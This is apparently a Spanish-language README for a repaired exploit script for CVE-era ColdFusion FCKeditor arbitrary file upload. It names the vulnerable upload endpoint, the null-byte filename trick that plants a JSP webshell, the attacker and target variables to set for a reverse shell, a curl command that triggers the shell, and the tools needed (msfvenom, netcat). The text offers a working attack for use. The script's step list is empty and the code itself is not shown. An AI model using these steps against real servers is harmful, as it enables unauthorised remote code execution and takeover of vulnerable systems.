
corrección para el script de exploit que no funciona en exploitdb (50057.py)
Ejecución remota de código no autenticada mediante la carga arbitraria de archivos en el componente FCKeditor incluido con ColdFusion. El endpoint de carga de archivos acepta una inyección de byte nulo en el parámetro filename, lo que permite que un webshell JSP sea cargado y ejecutado directamente por el servidor.
| Versión | Estado |
|---|
| ColdFusion 8.0 | Vulnerable |
| ColdFusion 8.0.1 | Vulnerable |
| ColdFusion 9.0 | Vulnerable* |
| ColdFusion MX 6.x | Vulnerable |
| ColdFusion MX 7.x | Vulnerable |
| ColdFusion 9.0.1+ | Parcheado |
| ColdFusion 10+ | No afectado |
*ColdFusion 9.0 es vulnerable si el componente FCKeditor no se ha eliminado/actualizado.
Parche: Adobe Security Bulletin APSB09-09 (julio de 2009).
Edite las variables al principio del script:
lhost = 'YOUR_IP'
lport = 4444
rhost = 'TARGET_IP'
rport = 8500
Ejecute:
python3 poc.py
El script hará lo siguiente:
Si el shell no llega en unos segundos, actívelo manualmente:
curl http://<rhost>:<rport>/userfiles/file/<filename>.jsp
El nombre del archivo se imprime en stdout después de la carga.
msfvenom
netcat (nc)
python3
/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm